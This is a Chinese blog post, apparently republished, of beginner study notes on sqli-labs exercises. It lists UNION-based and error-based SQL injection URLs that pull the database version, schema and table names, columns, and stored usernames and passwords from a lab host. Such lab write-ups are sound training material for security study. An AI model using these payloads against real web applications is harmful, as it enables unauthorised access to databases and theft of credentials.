sql注入第一天,题目

Posted 一鲸落万物生

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入第一天,题目相关的知识,希望对你有一定的参考价值。

一、查询数据库的版本号

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,version()

 

二、查询数据库中所有的库名

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata

 

三、查询当前库的所有表名

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables  where  table_schema=database()

 

 

 

 

四、查询当前库中某一个表的所有列

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from  information_schema.columns where table_schema = database() and table_name = \'users\'h

 

 

五、查询当前库中某一个表的所有值

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

 

127.0.0.1/Less-2/?id=-2 union select 1,2,group_concat(username, \'-\',password) from users

 

 

 

六、根据报错信息,

例:http://10.1.2.5:10631/sqli/Less-1/?id=1\'

 

 

有用信息为:\'\'1\'\' LIMIT 0,1\'

 

1、最终代码

http://10.1.2.5:10631/sqli/Less-1/?id=1\' union select 1,2,database() %23 \' LIMIT 0,1

其中id=1 1可写可不写

以上是关于sql注入第一天,题目的主要内容,如果未能解决你的问题,请参考以下文章

SQL学习第一天

SQL注入--结合源代码审计的SQL注入

CISP-PTE考前练习-SQL注入

CISP-PTE考前练习-SQL注入

5.11 sql注入天书第二天

部分sql注入总结